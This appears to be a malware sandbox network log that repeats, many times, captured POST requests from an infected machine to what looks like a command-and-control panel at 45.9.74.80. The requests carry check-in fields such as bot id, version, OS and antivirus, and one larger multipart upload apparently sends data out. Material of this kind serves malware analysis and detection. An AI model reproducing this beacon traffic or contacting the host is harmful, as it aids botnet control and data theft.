                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTY3NzA=Host: 45.9.74.80Content-Length: 96922Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
